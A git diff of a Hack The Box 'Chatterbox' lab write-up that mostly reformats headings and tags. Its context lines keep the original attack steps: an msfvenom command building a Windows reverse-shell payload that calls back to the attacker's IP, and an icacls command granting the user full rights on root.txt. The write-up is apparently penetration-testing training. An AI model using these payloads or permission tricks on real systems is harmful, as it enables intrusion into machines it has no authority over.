--- a/src/content/docs/htb/chatterbox.mdx
+++ b/src/content/docs/htb/chatterbox.mdx
@@ -1,9 +1,9 @@
 ---
 layout: /src/layouts/PostLayout.astro
 title: Chatterbox
-tags: []
+tags: ["shellcode"]
 ---
-**Start 19:32 24-08**
+**Start 19:32 24-08-2024**
 
 ---
 ```
@@ -11,7 +11,7 @@ tags: []
 ```
 ## Recon
 
-==Nmap==
+### Nmap
 ```bash
 ┌──(kali㉿kali)-[~]
 └─$ nmap 10.10.10.74                              
@@ -100,9 +100,7 @@ After some digging around I found that there's a `buffer overflow` vulnerability
 
 We can manually set up this exploit.
 
-## Exploitation
-
-==Foothold==
+## Foothold
 Using the above script I found I modified it to satisfy my needs:
 ```bash
 msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=80 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
@@ -129,7 +127,7 @@ After many tries it finally worked:
 
 ![](../../../assets/4d47a012bf13fa61e3c74ac997de003b.png)
 
-==user.txt==
+### user.txt
 As always we head to `\alfred\Desktop` where we find the flag:
 
 ```powershell
@@ -140,8 +138,7 @@ type user.txt
 
 
 ## Privilege Escalation
-
-==OS Info==
+### OS Info
 I started of by running `systeminfo` and found that there were over 100 hotfixes for this version, which means that most vulnerabilities will probably have been patched. Nonetheless:
 
 ```powershell
@@ -183,7 +180,7 @@ Logon Server:              \\CHATTERBOX
 
 We see that we're working with a `Windows 7 Professional` system, as we already knew from our `nmap` scan. 
 
-==icacls==
+### icacls
 I quickly found out that I did not actually have to get `system privileges` as I already have access to the directory, I just don't have `read access`:
 
 ![](../../../assets/db98949e277da72074361a9e024d2442.png)
@@ -197,6 +194,8 @@ icacls root.txt /grant alfred:F
 ![](../../../assets/50575dc8d797796ca729a45cc9046ad9.png)
 
 This is another way of getting [escalated read access](Windows%20Privilege%20Escalation.md#File%20&Directory%20Permissions#Misconfigured%20File%20Permissions) on certain files:
+
+### root.txt
 
 ```powershell
 C:\Users\Administrator\Desktop>type root.txt
@@ -212,5 +211,4 @@ type root.txt
 **Finished 22:26 24-08**
 
 [^Links]: [[Hack The Box]] [[OSCP Prep]]
-
-#Shellcode 
+ 
